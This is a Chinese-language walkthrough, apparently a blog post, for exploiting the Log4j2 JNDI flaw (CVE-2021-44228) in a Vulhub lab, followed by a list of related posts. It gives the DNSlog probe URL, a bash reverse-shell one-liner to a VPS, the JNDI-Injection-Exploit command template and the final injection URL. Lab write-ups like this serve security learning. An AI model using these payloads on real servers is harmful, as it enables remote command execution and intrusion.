Log4j2漏洞vul-hub通关教程

启动环境:

1.首先我们来到我们的来到靶场这里博主是在自己的vps上面docker上面搭接的vul-hub启动环境输入我们的命令:

cd vulhub/log4j/CVE-2021-44228

docker-compose up -d显示这样就代表成功启动了。
2.然后我们输入我们vps的IP地址然后加上给的端口去浏览器访问,看到成功访问到了。

检查漏洞是否存在:

3.然后我们来验证漏洞,我们需要准备一个DNSlog平台来验证是否存在漏洞,

4.然后将上面dnslong给的后缀添加到这条命令末尾:/solr/admin/cores?action={jndi:ldap://{sys:java.version}.0jhatp.dnslog.cn},然后拼接在原网站后面去访问。

5.去dnslog平台点击一下刷新就可以看到带出来的信息了。说明存在漏洞!!!

漏洞利用:

6.然后我们直接新建一个主机,并且监听端口

下载安装JDNI:

项目地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

7.然后将我们反弹shell的命令经过bae64编码后填入我们的代码模板执行。

反弹shell命令:bash -i >& /dev/tcp/自己的vpsIP/端口 0>&1

命令模板:
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]

执行后:

8.然后将生成的恶意代码类插入命令模板后面。命令模板:/solr/admin/cores?action=${jndi:填充}

9.然后将命令拼接在url后面访问即可

10.连接成功后去我们监听的那个机器就可以执行命令了。

相关推荐
谢尔登2 天前
【Nest】单元测试
单元测试·log4j
编啊编程啊程3 天前
【011】宠物共享平台
spring boot·log4j·maven·dubbo·宠物
为java加瓦12 天前
优化 Service 层架构:从高耦合到清晰分层的实战重构指南
log4j
Y1_again_0_again13 天前
Java中第三方日志库-Log4J
java·开发语言·log4j
杨小熊的笔记16 天前
final字段单元测试
单元测试·log4j
东方芷兰19 天前
JavaWeb 课堂笔记 —— 20 SpringBootWeb案例 配置文件
java·开发语言·笔记·算法·log4j·intellij-idea·lua
zero13_小葵司23 天前
基于Springboot的DDD实战(不依赖框架)
java·spring boot·log4j
加菲猫8601 个月前
Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)
log4j·apache
蛋黄液1 个月前
【黑马程序员】后端Web基础--Maven基础和基础知识
前端·log4j·maven